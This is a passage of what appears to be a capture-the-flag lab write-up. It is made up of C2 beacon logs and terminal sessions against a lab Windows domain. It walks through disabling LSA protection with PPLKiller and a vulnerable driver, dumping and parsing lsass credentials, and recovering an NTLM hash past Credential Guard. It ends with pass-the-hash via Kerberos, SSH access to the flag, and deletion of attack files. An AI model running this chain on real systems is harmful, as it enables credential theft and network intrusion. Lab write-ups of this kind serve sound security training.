[08/08 18:11:03] admin [9283148f] beacon > upload /home/user/Downloads/ERTLAB/IFIX-TCEN-TCEN/PPLKiller/PPLKiller.exe c:\programdata\.sample\PPLKiller.exe
[08/08 18:11:03] [*] Task: upload file
[08/08 18:11:05] [*] Agent called server, sent [49.58 Kb]
[08/08 18:11:06] [+] File successfully uploaded

+--- Task [9283148f] closed ----------------------------------------------------------+
[08/08 18:12:15] admin [e030f422] beacon > shell c:\programdata\.sample\PPLKiller.exe
[08/08 18:12:15] [*] Task: create new process
[08/08 18:12:20] [*] Agent called server, sent [89 bytes]
[08/08 18:12:21] [+] Program C:\Windows\System32\cmd.exe /c c:\programdata\.sample\PPLKiller.exe started with PID 3804 (output - with output)
[08/08 18:12:26] [+] Job [e030f422] output:
[+] Writing RTCore64.sys driver to disk
[+] Driver written to C:\Users\Public\Documents\RTCore64.sys
[+] SeLoadDriverPrivilege enabled.
[+] Driver installed and started successfully.
[+] Windows Version 1809 Found
[+] Disabling LSA Protection...
[*] Kernel base: 0xFFFFF8065D40A000
[*] PsInitialSystemProcess: 0xFFFF8D067604E080
[*] Found target EPROCESS: 0xFFFF8D067876D080
[+] SignatureLevel set to 0, protection disabled.
[+] LSA Protection disabled.
[+] Service stopped successfully.
[+] Service deleted successfully.
[+] Deleted C:\Users\Public\Documents\RTCore64.sys
[08/08 18:12:26] [+] Job [e030f422] finished

+--- Task [e030f422] closed ----------------------------------------------------------+
[08/08 20:06:19] admin [4aea324b] beacon > getsystem token
[08/08 20:13:49] admin [7b5548cc] beacon > nanodump_ppl_medic --valid -w C:\Windows\Temp\lsass.dmp
[08/08 20:13:49] [*] Running NanoDumpPPLMedic BOF
[08/08 20:13:54] [*] Agent called server, sent [164.35 Kb]
[08/08 20:14:07] [+] BOF output
Done, to download the dump run:
download C:\Windows\Temp\lsass.dmp
to get the secretz run:
python3 -m pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
[08/08 20:14:07] [+] BOF finished

+--- Task [7b5548cc] closed ----------------------------------------------------------+
[08/08 20:14:41] admin [0b823ac3] beacon > ls C:\Windows\Temp\
[08/08 20:14:41] [*] Task: list of files in a folder
[08/08 20:14:45] [*] Agent called server, sent [33 bytes]
[08/08 20:14:45] [+] List of files in the 'C:\Windows\Temp\' directory
 Type     Size           Last Modified         Name
 ----     ---------      ----------------      ----
          13.24 Mb       08/08/2025 11:14      lsass.dmp
          7.65 Mb        08/08/2025 09:03      MpCmdRun.log
          0.10 Kb        06/08/2025 12:39      silconfig.log

+--- Task [0b823ac3] closed ----------------------------------------------------------+
[08/08 20:16:58] admin [02683039] beacon > cp C:\Windows\Temp\lsass.dmp c:\programdata\.sample\lsass.dmp
[08/08 20:16:58] [*] Task: copy file
[08/08 20:17:02] [*] Agent called server, sent [79 bytes]
[08/08 20:17:03] [+] File copied successfully

+--- Task [02683039] closed ----------------------------------------------------------+
[08/08 20:19:03] admin [fa3aac79] beacon > rm C:\Windows\Temp\lsass.dmp
[08/08 20:19:03] [*] Task: remove file or directory
[08/08 20:19:05] [*] Agent called server, sent [42 bytes]
[08/08 20:19:05] [+] File deleted successfully

+--- Task [fa3aac79] closed ----------------------------------------------------------+
PS C:\programdata\.sample> ls


    Directory: C:\programdata\.sample


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----         8/8/2025   3:37 AM          88576 c.exe                                                                  
-a----         8/8/2025   4:14 AM       13885946 lsass.dmp                                                              
-a----         8/8/2025   4:08 AM          50688 PPLKiller.exe                                                          


PS C:\programdata\.sample> !download lsass.dmp lsass.dmp

Cleaning:

PS C:\programdata\.sample> rm lsass.dmp
PS C:\programdata\.sample> rm PPLKiller.exe
$ sudo apt install python3-pypykatz
$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
...
== LogonSession ==
authentication_id 886968 (d88b8)
session_id 0
username schicchi
domainname IFIXTCENTCEN
logon_server SOC
logon_time 2025-08-06T12:38:22.325624+00:00
sid S-1-5-21-1056286280-4062139808-1633864337-1112
luid 886968
	== MSV ==
		Username: schicchi
		Domain: IFIXTCENTCEN
			[LSA Isolated Data]
			Is NT Present: True
			Context Handle: 0x277f8493a60
			Proxy Info: 0x7ff8e46d9448
			Encrypted blob: a0000000000000000800000064000000010000000101000000000000063037726f64baaf8652c18e3326874306cd04d48ecbc212594b083315acac96a086a460d66a4034475ddf8d3cc7c9ba0100000000000000000000000000000001800000340000004e746c6d4861736891cc1caac73fd6977dfd8d9ec1be90f0628b008886833c3129128879634b71e88d5a9afed1ed3baa354069f47d4c9942f9bb6548
		DPAPI: 2b6d4f0a5019f50dbe10c0749dd54fe000000000
	== WDIGEST [d88b8]==
		username schicchi
		domainname IFIXTCENTCEN
		password None
		password (hex)
	== Kerberos ==
		Username: schicchi
		Domain: IFIXTCENTCEN.LOC
	== WDIGEST [d88b8]==
		username schicchi
		domainname IFIXTCENTCEN
		password None
		password (hex)
...

Found ``.

We use PassTheChallenge, to recover NTLM hashes from Credential Guard. Read more about the techniques here.

Binaries can be found here.

PS C:\programdata\.sample> !upload SecurityPackage.dll SecurityPackage.dll
PS C:\programdata\.sample> !upload PassTheChallenge.exe PassTheChallenge.exe
[08/08 20:38:22] admin [2daca87e] beacon > shell PassTheChallenge.exe inject SecurityPackage.dll
[08/08 20:38:22] [*] Task: create new process
[08/08 20:38:25] [*] Agent called server, sent [100 bytes]
[08/08 20:38:26] [+] Program C:\Windows\System32\cmd.exe /c PassTheChallenge.exe inject SecurityPackage.dll started with PID 4372 (output - with output)
[08/08 20:38:31] [+] Job [2daca87e] output:
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Package seems to be loaded
[08/08 20:38:31] [+] Job [2daca87e] finished

+--- Task [2daca87e] closed ----------------------------------------------------------+
[08/08 20:45:07] admin [c583469f] beacon > shell PassTheChallenge.exe nthash 0x277f8493a60:0x7ff8e46d9448 a0000000000000000800000064000000010000000101000000000000063037726f64baaf8652c18e3326874306cd04d48ecbc212594b083315acac96a086a460d66a4034475ddf8d3cc7c9ba0100000000000000000000000000000001800000340000004e746c6d4861736891cc1caac73fd6977dfd8d9ec1be90f0628b008886833c3129128879634b71e88d5a9afed1ed3baa354069f47d4c9942f9bb6548
[08/08 20:45:07] [*] Task: create new process
[08/08 20:45:08] [*] Agent called server, sent [430 bytes]
[08/08 20:45:09] [+] Program C:\Windows\System32\cmd.exe /c PassTheChallenge.exe nthash 0x277f8493a60:0x7ff8e46d9448 a0000000000000000800000064000000010000000101000000000000063037726f64baaf8652c18e3326874306cd04d48ecbc212594b083315acac96a086a460d66a4034475ddf8d3cc7c9ba0100000000000000000000000000000001800000340000004e746c6d4861736891cc1caac73fd6977dfd8d9ec1be90f0628b008886833c3129128879634b71e88d5a9afed1ed3baa354069f47d4c9942f9bb6548 started with PID 1388 (output - with output)
[08/08 20:45:14] [+] Job [c583469f] output:
Pass-the-Challenge (PtC) - by Oliver Lyak (ly4k)

[+] Server is alive
[+] Response:

NTHASH:7010AFB85BC7F2E97F0EE80C70D5892AFCFA617AC491D051
[08/08 20:45:14] [+] Job [c583469f] finished

+--- Task [c583469f] closed ----------------------------------------------------------+

Cleaning:

PS C:\programdata\.sample> rm PassTheChallenge.exe
PS C:\programdata\.sample> rm SecurityPackage.dll

Then crack the Net-NTLMv1 hash using https://ntlmv1.com/:

image

image

Found schicchi:552d466ea538d791d52453945f415ba3

Then get the hash and access to the final flag:

$ impacket-getTGT -dc-ip SOC.ifixtcentcen.loc ifixtcentcen.loc/schicchi -hashes ':552d466ea538d791d52453945f415ba3'                     
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in schicchi.ccache
$ export KRB5CCNAME=schicchi.ccache 
$ klist
Ticket cache: FILE:schicchi.ccache
Default principal: schicchi@IFIXTCENTCEN.LOC

Valid starting       Expires              Service principal
08/08/2025 21:14:31  08/08/2025 22:14:31  krbtgt/IFIXTCENTCEN.LOC@IFIXTCENTCEN.LOC
	renew until 08/09/2025 21:14:31
$ ssh schicchi@GABRIEL.ifixtcentcen.loc
$ schicchi@gabriel:/home/IFIXTCENTCEN/schicchi$ cd ../schicchi.backup
$ schicchi@gabriel:/home/IFIXTCENTCEN/schicchi.backup$ ls
final.flag.txt
$ schicchi@gabriel:/home/IFIXTCENTCEN/schicchi.backup$ cat final.flag.txt 
$ schicchi@gabriel:/home/IFIXTCENTCEN/schicchi.backup$ ls -al
total 8
drwx------ 2 schicchi root 4096 Apr 25 23:25 .
drwxr-xr-x 9 root     root 4096 Apr 25 20:18 ..
-rw-r--r-- 1 root     root    0 Aug 02 13:37 final.flag.txt

Issues fixing

  • Reduce MTU on tun0 interface:
$ sudo ip link set dev tun0 mtu 1350
  • Set legacy encryption methods for ssh:
$ ssh -oHostKeyAlgorithms=ssh-ed25519 -oKexAlgorithms=curve25519-sha256 -oCiphers=aes128-ctr red@10.0.1.200
$ ssh -oHostKeyAlgorithms=ssh-ed25519 -oKexAlgorithms=curve25519-sha256 -oCiphers=aes128-ctr ilona@GABRIEL.ifixtcentcen.loc
  • Compile and move DLL for nanodump extension module for Adaptix C2:
$ cd /home/user/Downloads/AdaptixC2/Extension-Kit/Creds-BOF/       
$ make                                                                                
_bin directory exists
[+] askcreds
[+] autologon
[+] credman
[+] hashdump
dist exists
[+] nanodump x64
[+] nanodump x86
[+] nanodump_ssp Dll x64
[+] nanodump_ssp Dll x86
[+] nanodump_ssp x64
[+] nanodump_ssp x86
[+] nanodump_ppl_dump Dll x64
[+] nanodump_ppl_dump Dll x86
[+] nanodump_ppl_dump x64
[+] nanodump_ppl_dump x86
[+] nanodump_ppl_medic Dll x64
[+] nanodump_ppl_medic x64
                                                                                                                                            
$ ls _bin                                                   
askcreds.x64.o   credman.x64.o   nanodump_ppl_dump.x64.o  nanodump_ppl_medic.x64.o  nanodump_ssp.x86.o  nanodump.x86.o
autologon.x64.o  hashdump.x64.o  nanodump_ppl_dump.x86.o  nanodump_ssp.x64.o        nanodump.x64.o
                                                                                                                                            
$ cd nanodump/dist 
$ ls     
bin2c                      nanodump_ppl_dump.x86.dll   nanodump_ppl_medic.x64.exe  nanodump_ssp.x64.o    nanodump.x64.exe
nanodump_ppl_dump.x64.dll  nanodump_ppl_dump.x86.exe   nanodump_ppl_medic.x64.o    nanodump_ssp.x86.dll  nanodump.x64.o
nanodump_ppl_dump.x64.exe  nanodump_ppl_dump.x86.o     nanodump_ssp.x64.dll        nanodump_ssp.x86.exe  nanodump.x86.exe
nanodump_ppl_dump.x64.o    nanodump_ppl_medic.x64.dll  nanodump_ssp.x64.exe        nanodump_ssp.x86.o    nanodump.x86.o
                                                                                                                                            
$ pwd                     
/home/user/Downloads/AdaptixC2/Extension-Kit/Creds-BOF/nanodump/dist
                                                                                                                                            
$ cp *.dll /home/user/Downloads/AdaptixC2/Extension-Kit/Creds-BOF/_bin/.